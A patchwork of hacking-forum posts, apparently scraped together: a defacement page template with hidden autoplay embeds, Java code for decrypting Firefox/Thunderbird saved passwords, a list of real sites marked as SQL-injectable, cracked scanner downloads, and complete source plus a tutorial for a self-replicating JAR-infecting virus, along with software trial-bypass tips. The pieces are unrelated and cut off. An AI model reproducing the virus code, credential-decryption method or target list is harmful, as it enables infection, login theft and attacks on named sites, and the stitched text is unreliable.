color="white ">_______________</font></strong></br> <p class="sub"><font color="white"></font></p> <strong><font color="red">Message for World : </font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <p><strong><font color="white">_______________</font></strong></p> <p>____________________________________ </p> <strong><font color="red">Message for Admin : </font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <p><strong><font color="white">_______________</font></strong></p> <p>____________________________________ </p> </div> </div> <div id="gallery" class="box left"> <div class="box-content"> <h3><font color="green">Gallery</font></h3> <p class="sub"><font color="white">Gallery of My Picture</font></p> </div> </div> <div id="about" class="box left"> <div class="box-content"> <h3><font color="white">About Defacer</font></h3> <p class="sub"><font color="white"></font></p> <strong><font color="red">Defacer Name:</font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <strong><font color="red">Specialization:</font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <strong><font color="red">Slogan:</font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <strong><font color="red">Email:</font></strong></br> <p><strong><font color="white">_______________</font></strong></p> <strong><font color="red">Skype:</font></strong><p><strong> <font color="#FFFFFF">_______________</font></strong></br> <strong><font color="white"> </font></strong></br> </div> </div> <div id="irc" class="box left"> <div class="box-content"> </div> </div> </div> </div> </div> </div> <div class="bottom"> <div class="bottom-block"> <h1 class="left">BLA BLA</h1> <h5 class="right">Copyright E 2013 Credits: BLA BLA </h5> </div> </div> </div> </div> <embed src="http://im34.gulfup.com/EiUi1.swf" width=0 height=0 border="0" type=audio/x-pn-realaudio-plugin true controls="controlpanel,statusbar" autostart=true loop=0> <embed src="http://greencall.co.kr/.p/we_will_not_go_down.swf" width="0" height="0" type="application/x-shockwave-flash"> </body> </html> Demo: :>=== Hacked By BLA BLA ===<:

Nu-mi dau seama deloc.....am incercat tot ce am avut in cap

This paper is written from the view of a programmer. It describes which algorithms are used by Mozilla to encrypt login data, i.e. saved passwords and usernames for websites in Firefox or the login data of your e-mail accounts in Thunderbird. I will provide some example code (Java) from my MozillaRecovery program. How I got the information: An information that you will find without problems is the location of your login data: It is the signons.sqlite (or signons.txt, signons3.txt in older versions), which can be found in the profile folder of your application. First thing I did was researching about the sqlite format: File Format For SQLite Databases It is recommended to use a hex editor to compare the description with your own signons.sqlite file. The format is well documented, so writing a program that obtains data from an sqlite file shouldn't be a problem. Because I read that the data is encoded in Base64 and not encrypted if no master password is set, I copied a username entry and tried to decode. But it didn't work. I guess it worked with older versions. Now there is some kind of encryption too. I searched for open-source programs that recover passwords from Firefox or Thunderbird and found this: ThunderbirdPassDecryptor : Free Thunderbird Password Recovery Software | www.SecurityXploded.com Old website entries told me it was open-source, but I couldn't find any source to download. Old postings in the forum of securityxploded told me, that they changed this. Some people had used their code for writing maleware, so antivirus scanner recognized their program as a virus. It is pretty sad that the lazyness (not writing their own code, just grieving) and improvidence of some people forced the authors of ThunderbirdPassDecryptor to hide their knowledge. The further search for open-source programs was not fruitful. In fact, signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. This is where the trouble began. I couldn't find information about that file for a long time, so I downloaded the source code of Thunderbird, looked into it for several days and learned more about it's inner workings. I discovered that the login data in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well. One day I stumbled on this website and it helped me a lot: Netscape Key Database It describes how the keys in key3.db can be obtained. But not everything is correct anymore. Some changes are necessary. First thing that made me think: Initially you will need the database password Where do I get that from? I just guessed that this is the master password and was right. I also got the idea that the entry values should follow right after the entry name (I am not sure if it is standard knowledge to do it in another way). I.e. looking at the key3.db in a hex editor you might get that picture on the plain text side: ...................password-check.Version.......... Which means the password-check entry would only have a one byte value. That couldn't be true. But the version entry which follows right after, only has a one byte value. So I tried it backwards, with the entry name following it's value (which lead to the problem to find out where the entries start). It was still not enough to get it working. Since this website provides some test vectors (I am very grateful for that), I was able to implement and verify the decryption algorithm. Now I knew that it worked with the data on this website, but it still didn't work with my own key3.db file. I can't really say how I got the idea, but I changed the length of the global salt entry from 16 bytes to 20 bytes. I guess it was just out of a hunch while looking at the hex values. Surprisingly this was the right thing. My test output decrypted the string "password-check" and I was happy. This is how I got the main algorithm for checking if a master password is the right one. I still didn't implement a program for obtaining the login data out of signons.sqlite, once you got the key entries from key3.db. But my hunger for knowing how it works is satisfied and implementing it shouldn't be necessary at all. Reason: Thunderbird and Firefox show you the data (passwords included) in plaintext, if you know the master password. If no master password is given, the data is not secured at all, just encrypted with a hardcoded key: infond: Firefox passwords management leaks (I didn't verify this yet, but I will) How Mozilla saves login data: Summary: login data is saved in signons.sqlite. It is encoded in Base64, encrypted with TripleDES in CBC mode and standard block padding. The key for the decryption is saved in key3.db. The entries in key3.db are encrypted with the master password. The decryption algorithm (of the key3.db entries) is not straight forward, but shown right after. Sqlite Format: File Format For SQLite Databases Netscape Communicator Key Database Format: Netscape Key Database Work through this description, but change the following: the global salt value is 20 bytes (not 16 bytes) long (I think there may be a value indicating the length of the global salt somewhere) the plain text entry names (i.e. Version, global salt) follow after their values the database password is the master password To verify the master password and your decryption algorithm, use the check-password entry. Its value is the encrypted string "check-password". Java example code: extracted from MozillaRecovery Key3.db key derivation algorithm: The comments are in the notation of the website mentioned above. private static String decrypt(byte[] password, byte[] es, byte[] gs, byte[] text) { try { // HP = SHA1(global-salt||password) byte[] hp = SHA.sha1(appendArray(gs, password)); byte[] pes = Arrays.copyOf(es, 20); // CHP = SHA1(HP||ES) byte[] chp = SHA.sha1(appendArray(hp, es)); // k1 = CHMAC(PES||ES) byte[] k1 = SHA.sha1Hmac(appendArray(pes, es), chp); // tk = CHMAC(PES) byte[] tk = SHA.sha1Hmac(pes, chp); // k2 = CHMAC(tk||ES) byte[] k2 = SHA.sha1Hmac(appendArray(tk, es), chp); // k = k1||k2 byte[] k = appendArray(k1, k2); byte[] desKey = Arrays.copyOf(k, 24); byte[] desIV = Arrays.copyOfRange(k, k.length - 8, k.length); return new TripleDES(desKey, desIV).decrypt(text); } catch (NoSuchAlgorithmException e) { logger.fatal(e.getMessage()); e.printStackTrace(); } catch (BadPaddingException e) { logger.debug(e.getMessage() + ". Probably wrong key."); } return null; } SHA-1 and HMAC-SHA1: import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import javax.crypto.Mac; import javax.crypto.spec.SecretKeySpec; public class SHA { private static final String HMAC_SHA1_ALGORITHM = "HmacSHA1"; private static final String SHA1_ALGORITHM = "SHA-1"; public static byte[] sha1Hmac(byte[] data, byte[] key) { try { SecretKeySpec signingKey = new SecretKeySpec(key, HMAC_SHA1_ALGORITHM); Mac mac = Mac.getInstance(HMAC_SHA1_ALGORITHM); mac.init(signingKey); return mac.doFinal(data); } catch (NoSuchAlgorithmException | InvalidKeyException e) { e.printStackTrace(); } return null; } public static byte[] sha1(byte[] text) throws NoSuchAlgorithmException { MessageDigest md = MessageDigest.getInstance(SHA1_ALGORITHM); md.update(text, 0, text.length); return md.digest(); } }} TripleDES: import java.io.UnsupportedEncodingException; import java.security.InvalidAlgorithmParameterException; import java.security.InvalidKeyException; import java.security.NoSuchAlgorithmException; import java.security.NoSuchProviderException; import java.security.spec.InvalidKeySpecException; import java.security.spec.KeySpec; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; import javax.crypto.NoSuchPaddingException; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.DESedeKeySpec; import javax.crypto.spec.IvParameterSpec; public class TripleDES { private KeySpec keySpec; private SecretKey key; private IvParameterSpec iv; public TripleDES(byte[] keyBytes, byte[] ivString) { try { keySpec = new DESedeKeySpec(keyBytes); key = SecretKeyFactory.getInstance("DESede") .generateSecret(keySpec); iv = new IvParameterSpec(ivString); } catch (InvalidKeySpecException | NoSuchAlgorithmException | InvalidKeyException e) { e.printStackTrace(); } } public byte[] encrypt(byte[] text) { if (text != null) { try { Cipher cipher = Cipher.getInstance("DESede/CBC/PKCS5Padding", "SunJCE"); cipher.init(Cipher.ENCRYPT_MODE, key, iv); return cipher.doFinal(text); } catch (IllegalBlockSizeException | InvalidKeyException | InvalidAlgorithmParameterException | NoSuchAlgorithmException | NoSuchProviderException | NoSuchPaddingException | BadPaddingException e) { e.printStackTrace(); } } return null; } public String decrypt(byte[] text) throws BadPaddingException { if (text != null) { try { Cipher cipher = Cipher.getInstance("DESede/CBC/PKCS5Padding", "SunJCE"); cipher.init(Cipher.DECRYPT_MODE, key, iv); byte[] result = cipher.doFinal(text); return new String(result, "UTF8"); } catch (NoSuchAlgorithmException | NoSuchProviderException | NoSuchPaddingException | IllegalBlockSizeException | InvalidKeyException | InvalidAlgorithmParameterException | UnsupportedEncodingException e) { e.printStackTrace(); } } return null; } } Source: EZ

O lista de site-uri cu posibile vulnerabilitati: http://mt.ro/nou/articol.php?id=glf32' http://mcxchakraa.com/buy.php?Id=2' http://www.guevaragallery.com/art.php?id=1' http://www.she-inc.org/art.php?id=55' http://www.romania-sanakirja.net/online/index.php?uid=9999999&word=tuo/trainers.php?id=%5C%5C%5C%5C%5C http://www.starnet-iasi.ro/galerie.php?id=8' http://www.revista22.ro/articol.php?id=22250' http://www.romanianwriters.ro/author.php?id=4' O sa fac update la lista cand mai gasesc site-uri. P.S - Nu este cine stie ce,poate cineva stie ce sa faca cu ele si aprecieaza efortul. For educational purposes only

Nova versão do programa que desenvolvi para detectar invasores e capturar dados de sua rede. Funções: > Captura de IP. > Captura do Host. > Captura Data e hora. > Salva Log em banco de dados. > Captura digitos do atacante no cmd. > Catpura portas aberta do atacante. > Inicia junto com o windows(Opcional). > Envia mensagem para o atacante. > Grava configurações em banco de dados. Download: Instalador Anti Hacker Ataque - Download - 4shared - Brlo0ping Brlo0ping Netestat & Nescanat!! Source: GuiadoHacker

// NU sa salvat ce-am scris!!

There are a lot of software that you want to carry with you so that you can open them anywhere without any installations. Here is the solution to create a portable version of any software.Moreover you can also create a package of software.. Consider you love using Firefox browser and addicted to its user interface.You can create the portable version of Firefox with java and flash already installed in the Firefox. So you are not creating a portable version of your favorite browser instead you are creating a portable executable package file that has Firefox with flash and java already installed in it. Your Firefox Package= Firefox Browser+Java+Flash+Addons You can create a portable package of your choice of softwares. Here is the complete step by step video tutorial to Make Portable Version Of any Software Using Cameyo 1. Download the Cameyo software.Its completely free. Cameyo Application Virtualization - CNET Download.com 2.Install the software. 3.Now Click on Start->Cameyo->Caputre Software Installation 4.Intstall the software into your system whose portable version you want to create. 5.After Complete installation of the software click on the Install Done of the cameyo screen. 6.Now it will create a portable version of your installed software which you can carry and run anywhere without any installation. SOURCE: VS

How to Hide Data in Image, Audio and Video Files:Steganography Ever wondered to know how to hide secret data in image, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data. What is Steganography? Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected. The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity. What are the Applications of Steganography? Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection. Even though steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Rumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001. How do Steganography Tools Work? Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data. There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However, I have managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link. Download StegoMagic 1.0, Descarca StegoMagic The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file. With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept. At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process. How to Use Stego Magic? Suppose you want to hide a text message inside a JPG file: 1.Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe 2.Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image. Please note that if you’re using Windows 7/Vista, right-click the file and select “Run as Administrator”. Otherwise the tool may fail to work properly. 3.Note down the secret decryption key. Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key. Source: VS

To verify your e-mail address, please check your inbox for your CloudShare activation e-mail. Inside this e-mail you must click the verification link to complete the registration process. If you do not see the e-mail in your inbox, please check your Spam/Bulk/Junk folder. The CloudShare Team

Tks

Short explanation: This little virus infects runnable jar files by updating the host file with its own .class files and modifying the manifest, so the virus is run first. The virus uses reflection to start the host file afterwards. This way the host still does what it is supposed to and in addition infects other runnable jar files. Besides that the virus does no harm (I mean, doing harm is easy, why bother with trivia). But you see that a file is infected if you start it on console. You will get the virus output first. The virus also only infects files in the same directory, because this was the easiest for testing (it is also trivial to change that) ----------------------------------------------------------------------------------------- And here is the code, as usual with an intentional bug in it to prevent noobs from running. Do not point out the bug in public! This code only works if run in a .jar Jarchiver: package jarvir; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.nio.file.StandardCopyOption; import java.util.Map.Entry; import java.util.Set; import java.util.jar.Attributes; import java.util.jar.JarEntry; import java.util.jar.JarInputStream; import java.util.jar.JarOutputStream; import java.util.jar.Manifest; public class Jarchiver { private final String jarFile; private Manifest manifest; public static void main(String[] args) { System.out.println("Success: Jarchiver as dummy host file started"); } public Jarchiver(String jarFile) throws IOException { this.jarFile = jarFile; try (JarInputStream is = new JarInputStream( new FileInputStream(jarFile))) { manifest = is.getManifest(); } } private void printAttributes(Manifest man) { Attributes attr = man.getMainAttributes(); for (Entry<Object, Object> entry : attr.entrySet()) { System.out.println(entry); } } public String readEntryPoint() { Attributes attr = manifest.getMainAttributes(); return attr.getValue(Attributes.Name.MAIN_CLASS); } public void changeEntryPoint(String entryPoint) { Attributes attr = manifest.getMainAttributes(); attr.put(Attributes.Name.MAIN_CLASS, entryPoint); printAttributes(manifest); } public void updateJar(Set<String> inFiles, String ownJar, String hostName) throws FileNotFoundException, IOException { String jarOut = jarFile + "out.jar"; try (JarInputStream jin = new JarInputStream(new FileInputStream( jarFile)); JarInputStream ownIn = new JarInputStream(new FileInputStream( ownJar)); JarOutputStream jout = new JarOutputStream( new FileOutputStream(jarOut), manifest)) { copyHost(jin, jout); writeInFiles(inFiles, ownIn, jout); writeHostName(jout, hostName); } replace(jarFile, jarOut); } private void writeHostName(JarOutputStream out, String hostName) throws IOException { out.putNextEntry(new JarEntry("jarvir/host")); out.write(hostName.getBytes()); out.closeEntry(); } private void writeInFiles(Set<String> inFiles, JarInputStream ownIn, JarOutputStream jout) throws IOException { JarEntry entry; while ((entry = ownIn.getNextJarEntry()) != null) { if (inFiles.contains(entry.getName())) { writeJarEntry(jout, ownIn, entry); System.out.println("write own entry " + entry); } } } private void copyHost(JarInputStream jin, JarOutputStream jout) throws IOException { JarEntry entry; while ((entry = jin.getNextJarEntry()) != null) { writeJarEntry(jout, jin, entry); System.out.println("write entry " + entry); } } private void replace(String toReplace, String replacement) throws IOException { Path source = Paths.get(replacement); Path target = Paths.get(toReplace); Files.move(source, target, StandardCopyOption.REPLACE_EXISTING); } private void writeJarEntry(JarOutputStream out, JarInputStream in, JarEntry entry) throws IOException { out.putNextEntry(entry); byte[] buf = new byte[1024]; int bytesRead; while ((bytesRead = in.read(buf)) != -1) { out.write(buf, 0, bytesRead); } out.closeEntry(); } } JarVir: package jarvir; import java.io.BufferedReader; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.RandomAccessFile; import java.io.UnsupportedEncodingException; import java.lang.reflect.Method; import java.net.URLDecoder; import java.util.HashSet; import java.util.Set; public class JarVir { private String newHostEntry; public static void main(String[] args) { System.out.println("JarVir is alive!"); new JarVir(args); } public JarVir(String[] args) { for (String jarfile : searchJars()) { System.out.println("infecting " + jarfile); infect(jarfile); } invokeHostMain(args); } @SuppressWarnings("rawtypes") private void invokeHostMain(String[] args) { try { String hostName = getHostName(); if (hostName != null) { Class<?> host = Class.forName(hostName); Class[] argTypes = new Class[] { String[].class }; Method main = host.getDeclaredMethod("main", argTypes); System.out.format("invoking %s.main()%n", host.getName()); main.invoke(null, (Object) args); } } catch (Exception e) { e.printStackTrace(); } } private String getHostName() throws IOException { String name = null; InputStream in = getClass().getResourceAsStream("host"); if (in != null) { try (BufferedReader reader = new BufferedReader( new InputStreamReader(in))) { name = reader.readLine(); } } else { System.err.println("host not found"); } return name; } private Set<String> searchJars() { Set<String> jars = new HashSet<>(); File folder = new File(System.getProperty("user.dir")); for (File file : folder.listFiles()) { if (isJar(file)) { jars.add(file.getAbsolutePath()); } } return jars; } private boolean isJar(File file) { if (file.isDirectory()) { return false; } final int MAGIC_NUMBER = 0x50AA0304; try (RandomAccessFile raf = new RandomAccessFile(file, "r")) { return raf.readInt() == MAGIC_NUMBER; } catch (IOException e) { e.printStackTrace(); } return false; } private void infect(String jarFile) { try { Jarchiver jar = new Jarchiver(jarFile); newHostEntry = jar.readEntryPoint(); if (newHostEntry.equals(JarVir.class.getName())) { System.out.println("jar already infected"); } else { jar.changeEntryPoint(JarVir.class.getName()); Set<String> inFiles = getOwnEntries(); jar.updateJar(inFiles, getRunningJarLocation(), newHostEntry); } } catch (IOException e) { e.printStackTrace(); } } private Set<String> getOwnEntries() { Set<String> inFiles = new HashSet<>(); inFiles.add("jarvir/Jarchiver.class"); inFiles.add("jarvir/JarVir.class"); return inFiles; } private String getRunningJarLocation() { String path = JarVir.class.getProtectionDomain().getCodeSource() .getLocation().getPath(); try { return URLDecoder.decode(path, "UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } return null; } } And "host" is a txt file that also resides in the jarvir directory with the String "jarvir.Jarchiver" as dummy for the first run (when there is no host). A sample output: deque@decra:~/virtest$ java -jar jarvir.jar JarVir is alive! infecting /home/deque/virtest/jarvir.jar jar already infected infecting /home/deque/virtest/app.jar Rsrc-Class-Path=./ Class-Path=. Manifest-Version=1.0 Rsrc-Main-Class=testpackage.App1 Main-Class=jarvir.JarVir write entry org/ write entry org/eclipse/ write entry org/eclipse/jdt/ write entry org/eclipse/jdt/internal/ write entry org/eclipse/jdt/internal/jarinjarloader/ write entry org/eclipse/jdt/internal/jarinjarloader/JIJConstants.class write entry org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo.class write entry org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader.class write entry org/eclipse/jdt/internal/jarinjarloader/RsrcURLConnection.class write entry org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandler.class write entry org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory.class write entry testpackage/ write entry testpackage/App1.class write own entry jarvir/JarVir.class write own entry jarvir/Jarchiver.class invoking jarvir.Jarchiver.main() Success: Jarchiver as dummy host file started deque@decra:~/virtest$ java -jar app.jar JarVir is alive! infecting /home/deque/virtest/jarvir.jar jar already infected infecting /home/deque/virtest/app.jar jar already infected invoking org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main() Source: Ez

This paper explains how to create a virus, that infects runnable Java Archive Files (JAR) while preserving their functionality. I invented this technique, but I think it is something you can easily come up with once you know how a JAR works. The Java Archive File At first you need to know how your host program actually works to preserve the functionality of the host. A JAR file is a ZIP file with the file ending .jar and a file named MANIFEST.MF in it. The JAR usually contains Java Bytecode. A runnable JAR has an entry in the MANIFEST.MF that tells the Java Runtime which class contains the main method, so that it knows where to start the execution. A typical manifest resides in the folder META-INF and looks like this: Manifest-Version: 1.0 Class-Path: . Main-Class: gui.AppStarter The entry Main-Class tells here that the main method can be found in gui/AppStarter.class within the JAR. Knowing that the JAR file is just a ZIP, you can also handle it like this and extract it with i.e. 7zip. The JAR infection technique To infect a JAR, the virus has to update the JAR with its own .class files and change the manifest Main-Class entry so that the virus is executed. But it also has to preserve the old Main-Class entry in order to execute the host, when the host is run. So these are the steps in an overview: 1. Look for JAR files. 2. For every JAR do: If JAR not infected, go on with next steps. 3. Change the manifest Main-Class entry to the virus main class. 4. Copy the virus .class files into the JAR. 5. Save the old manifest entry somewhere in the JAR. 6. Execute the own host by looking at the preserved manifest entry. Step 1: Looking for JAR files Basically you can try to either search for files with a ".jar" ending or you make it more robust and check if it actually is a ZIP with a manifest in it. For the latter you can use the following method to determine if the file is a ZIP: private boolean isZip(File file) { if (file.isDirectory()) { return false; } final int MAGIC_NUMBER = 0x504B0304; try (RandomAccessFile raf = new RandomAccessFile(file, "r")) { return raf.readInt() == MAGIC_NUMBER; } catch (IOException e) { e.printStackTrace(); } return false; } First you make sure the file is no directory, afterwards you check if the first 8 bytes of the file are the MACIG_NUMBER. That number is the file signature for ZIP. Here you find a huge list of file signatures: File Signatures Step 2: Determine infection You don't want to infect files twice, so you need a method to determine whether a JAR already has been infected. I figured, I would just compare the Main-Class entry in the manifest. If it equals the virus entry, it is already infected. Jarchiver jar = new Jarchiver(jarFile); hostEntry = jar.readEntryPoint(); if (hostEntry.equals(JarVir.class.getName())) { System.out.println("jar already infected"); } hostEntry is the entry point of the file to be infected. JarVir.class.getName() returns the entry point of the virus. If they are equal, the JAR is already infected. The Jarchiver is a helper class for the virus that provides functions for updating JAR and reading the manifest. Here is how the Jarchiver reads the entry point of the manifest: private final String jarFile; private Manifest manifest; public Jarchiver(String jarFile) throws IOException { this.jarFile = jarFile; try (JarInputStream is = new JarInputStream( new FileInputStream(jarFile))) { manifest = is.getManifest(); } } public String readEntryPoint() { Attributes attr = manifest.getMainAttributes(); return attr.getValue(Attributes.Name.MAIN_CLASS); } Step 3: Updating the manifest We use the Jarchiver again to update the manifest Main-Class entry with the main class of the virus: jar.changeEntryPoint(JarVir.class.getName()); It looks like this in the Jarchiver: public void changeEntryPoint(String entryPoint) { Attributes attr = manifest.getMainAttributes(); attr.put(Attributes.Name.MAIN_CLASS, entryPoint); printAttributes(manifest); } This doesn't change the manifest on disk already, but in memory. When updating the JAR in the next step the new manifest is written into it. Step 4: Updating the JAR This turned out to be not that straight forward, because in order to update a JAR you have to create an entirely new JAR and replace the old one with the new file. This is what the virus does: It gets the location of the own .class files and the names of them that shall be copied into the host and it provides the old entry point of the host (meaning the host class that contains the main method) Set<String> inFiles = getOwnEntries(); jar.updateJar(inFiles, getRunningJarLocation(), newHostEntry); The own entries are the two virus .class files to be written: private Set<String> getOwnEntries() { Set<String> inFiles = new HashSet<>(); inFiles.add("jarvir/Jarchiver.class"); inFiles.add("jarvir/JarVir.class"); return inFiles; } And you get the location of the currently running JAR like this: private String getRunningJarLocation() { String path = JarVir.class.getProtectionDomain().getCodeSource() .getLocation().getPath(); try { return URLDecoder.decode(path, "UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } return null; } You need this location and the entries to copy the virus into the new host file. Why don't just copy the whole JAR? Because the virus will operate from host JAR files which contain more than just the virus itself. So you only copy the virus files into new hosts and not more. The Jarchiver updates the JAR like this: public void updateJar(Set<String> inFiles, String ownJar, String hostName) throws FileNotFoundException, IOException { String jarOut = jarFile + "out.jar"; try (JarInputStream jin = new JarInputStream(new FileInputStream( jarFile)); JarInputStream ownIn = new JarInputStream(new FileInputStream( ownJar)); JarOutputStream jout = new JarOutputStream( new FileOutputStream(jarOut), manifest)) { copyHost(jin, jout); writeInFiles(inFiles, ownIn, jout); writeHostName(jout, hostName); } replace(jarFile, jarOut); } Those are quite a few steps, so let's make this a bit more clear: The Jarchiver creates two InputStreams, one for the JAR that has to be infected (jin) and one for the JAR the virus is currently running in (ownIn). It creates an OutputStream (jout) to write an updated copy of the JAR, that contains virus, host and a note with the main class of the host. Afterwards it replaces the old JAR file with the updated one. Here are the methods copyHost and writeInFiles in detail: private void writeInFiles(Set<String> inFiles, JarInputStream ownIn, JarOutputStream jout) throws IOException { JarEntry entry; while ((entry = ownIn.getNextJarEntry()) != null) { if (inFiles.contains(entry.getName())) { writeJarEntry(jout, ownIn, entry); System.out.println("write own entry " + entry); } } } private void copyHost(JarInputStream jin, JarOutputStream jout) throws IOException { JarEntry entry; while ((entry = jin.getNextJarEntry()) != null) { writeJarEntry(jout, jin, entry); System.out.println("write entry " + entry); } } private void writeJarEntry(JarOutputStream out, JarInputStream in, JarEntry entry) throws IOException { out.putNextEntry(entry); byte[] buf = new byte[1024]; int bytesRead; while ((bytesRead = in.read(buf)) != -1) { out.write(buf, 0, bytesRead); } out.closeEntry(); } Both use writeJarEntry, which writes exactly one entry to the specified output stream. Step 5: Save the old entry point of the host To preserve the entry point of the host the method writeHostName writes a files with the hostname string into the JAR: private void writeHostName(JarOutputStream out, String hostName) throws IOException { out.putNextEntry(new JarEntry("jarvir/host")); out.write(hostName.getBytes()); out.closeEntry(); } This will be read by the virus upon execution of the new host file. Step 6: Execute the own host The virus that has just infected other host files, still has to execute the host of the JAR it is currently running in. This step was for me the most difficult, because I never had to use reflection before. The problem is that we only have a name of class. We do not have direct access to the class or its main method. So we need to use reflection to get the class and execute the main method. This is done here: private void invokeHostMain(String[] args) { try { String hostName = getHostName(); if (hostName != null) { Class<?> host = Class.forName(hostName); Class[] argTypes = new Class[] { String[].class }; Method main = host.getDeclaredMethod("main", argTypes); main.invoke(null, (Object) args); } } catch (Exception e) { e.printStackTrace(); } } In order to get to know more about reflection in Java, read this: Trail: The Reflection API (The Java

This is a network vulnerability scanning tools. Web crawler to test the security of your site , testing the popular attacks, such as cross-site scripting, SQL injection. The scanning cart before been hacked, tables, security zones and other Web applications. 75% of Internet attacks target Web-based applications. Because they often access to confidential data and is placed before the firewall. Backup a 2013_04_16_01_webvulnscan8 original network disk download address: http://pan.baidu.com/share/link?shareid=393531&uk=1460073811 Use: first official address Download the latest Enterprise Edition installation package [RI only supports the Enterprise Edition does not support the free version], close the program after the installation is complete, open the crack patch, Patch points can be properly registered, the registration information is as follows, registered support normal after the upgrade! Do not used for illegal purposes, or peril! Acunetix_Web_Vulnerability_Scanner_8.x_Enterprise_Edition_ keygen exe MD5: 6EF77924A7D92E6FF168053E3B4A5814 Acunetix_Web_Vulnerability_Scanner_8.x_Consultant_Edition_KeyGen_Hmily [LCG] rar MD5: 302C3EC2C7F726E253400CAB654C7AF5 http://pan.baidu.com/netdisk/singlepublic?fid=182594_3695254633 NETESTAT - NESCANAT Source: http://www.52pojie.cn/thread-148273-1-1.html

ULTRASURF "Browse the world without any limit for free with safety" New revolution in the field of proxy, simple to use and faster. No more slot limitations, time limits, geographical limits, bandwidth problems in same old proxies. Switch to UltraSurf 8.9 UltraSurf is the flagship software product from UltraReach Internet Corp. for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. As the safety and convenience of the users is our first priority, the most prominent features of UltraSurf 8 are that it has implemented a complex proxy with complete transparency and a high level of encryption on the Microsoft Internet Explorer (IE) platform. UltraSurf 8 enables users to browse any website freely just the same as using the regular IE browser while it automatically searches the highest speed proxy servers in the background. UltraSurf 8 implements almost all browser functions based on HTTP and user needs, such as browsing websites, login and posting on web forums, using Web mail, uploading and downloading data files, real time audio, video and other multimedia programs, etc. Please refer to the “UltraSurf 8 Users Guide” for detailed information. UltraSurf 8 is a green software, which means no installation process is needed nor system setting is required to change when using the software. It is simply an executable on Windows platform. Download the UltraSurf 8 client software now https://ultrasurf.us/download/u.zip NETESTAT SAU SCANAT!! ////Rog un moderator sa mute topicul la Programe,acum am vazut ca l-am postat la tutoriale o_O. Imi cer scuze.

In this post, I will show you how to hack a Software and run the trial program forever. Most of us are familiar with many software programs that run only for a specified period of time in the trial mode. Once the trial period is expired, these programs stop functioning and demand for a purchase. However, there is a way to run the software programs so that they function beyond the trial period. Isn’t this interesting? Well, before I tell you how to hack the software and make it run in the trial mode forever, we will have to first understand how the licensing scheme of these programs work. I’ll try to explain this in brief. When the software programs are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After the installation, every time you run the program, it compares the current system date and time with the installed date and time. With this, it can make out whether the trial period is expired or not. So, with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate. RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application. RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7. You can download RunAsDate from the following link: RunAsDate Steps to Hack the Software and Run the Trial Program Forever: You will have to follow these tips carefully to successfully hack a software and make it run in the trial mode forever: 1.Note down the date and time, when you install the software for the first time. 